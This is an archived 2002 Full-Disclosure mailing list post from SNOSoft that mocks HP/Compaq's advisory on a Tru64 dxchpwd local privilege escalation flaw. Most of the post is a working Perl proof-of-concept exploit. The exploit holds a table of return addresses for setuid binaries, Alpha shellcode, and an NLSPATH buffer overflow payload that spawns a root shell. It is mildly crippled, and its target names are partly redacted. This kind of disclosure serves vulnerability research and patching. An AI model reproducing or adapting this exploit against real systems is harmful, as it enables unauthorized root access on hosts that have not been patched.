----- Original Message ----- *From:* KF <mailto:dotslashat_private> *To:* bugtraqat_private <mailto:bugtraqat_private> *Cc:* full-disclosureat_private <mailto:full-disclosureat_private> ; vuln-devat_private <mailto:vuln-devat_private> *Sent:* Monday, August 05, 2002 12:22 PM *Subject:* [Full-Disclosure] In regards to ... http://online.securityfocus.com/bid/5382 In regards to ... http://online.securityfocus.com/bid/5382 and http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README - SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because the public had not seen an exploit? This ECO has not been through an exhaustive field test process. Due to the experimental stage of this ECO/workaround, Hewlett-Packard makes no representations regarding its use or performance. The customer shall have the sole responsibility for adequate protection and back-up data used in conjunction with this ECO/workaround. ^--- hrmm cute. I think I can make one of those right quick too. This SNOSoft Proof of Concept Tool has not been through an exhaustive field test process. Due to the experimental stage of this Tool, SNOSoft makes no representations regarding its use or performance. The customer of Compaq / HP shall have the sole responsibility for adequate protection and back-up data used in conjunction with his or her own system and the use of the following SNO/Proof of Concept Tool. Official SNO workaround is: See vendor or if paranoid chmod -s everything in sight. This is supposed to be the vendor fix... I have not tested it. I assume with the coordination from CERT and the concious decision to release a public patch that the vendor has provided a good workaround. http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README Please note after all the public drama with HP look whos name ends up in the credit section. *grin* Good find guys... lets give the HP dev staff a round of applause. *sarcasm* Tru64 DXCHPWD Local Privilege Escalation Vulnerability Credit: Published in a Compaq security advisory. Hrmm how nice of them to mention us. I will give someone a cookie if they can tell me when NLSPATH was first a big issue on OTHER unix systems. I hope this isn't broken... if it is don't whine to me ... fix it. --- begin copyrighted material #!/usr/bin/perl -w # # stripey (stripeyat_private <mailto:stripeyat_private>) # # This code is copyrighted by Snosoft # http://www.snosoft.com # If you are a direct employee of HP or Compaq # you are not aloud to look at this program or use it. # in order to protect our copyright on this # program we have crippled it (at least) by adding # _IWORKATHP to some part of the code.If # you do not work for HP or Compaq you may # remove these letters at will provided this copyright notice # remains attached to the header of this code. . # As stated above if you work at hp you should # not even be reading at this point. However if # you are please note that by removing the letters # _IWORKATHP from this document you are violating # the DMCA section 1201(a) # Also Please note that most of the targets in # this are removed pending CERT releases. $tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY"; $tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA"; $tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM"; $tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL"; $tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR"; $tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd"; $tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS"; $tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X"; unless (($target,$offset,$align) = @ARGV,$align) { print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{"$key"}); print "\t$key. $b\n"; } print "\n"; exit 1; } ($a,$b) = split(/\:/,$tgts{"$target"}); print "*** Target: $b, Offset: $offset, Align: $align ***\n\n"; $ret = pack("ll",(unpack("l",$a)+$offset), 0x1); # GOBBLES someday I will switch gears in the sweat shop and # get that shellcode wrote uo. That was quite the entertaining # talk or speach or whatever this weekend. # shellcode by Taeho Oh $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42"; $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2"; $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2"; $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43"; $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43"; $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6"; $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22"; $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26"; $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43"; $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff"; $tlen = (1024-(length($sc)))/4; $buf .= "B"x$align; $buf .= pack("l",0x47ff041f)x($tlen-1); $buf .= $sc; $buf .= $ret; $ENV{"NLSPATH"} = $buf; if ($target == 7) { print "Hit ctrl-d...\n"; } if ($target == 6) { exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'"); } else { exec("$b"); } ---- end copyrighted material -KF
This archive was generated by hypermail 2b30 : Mon Aug 05 2002 - 10:48:41 PDT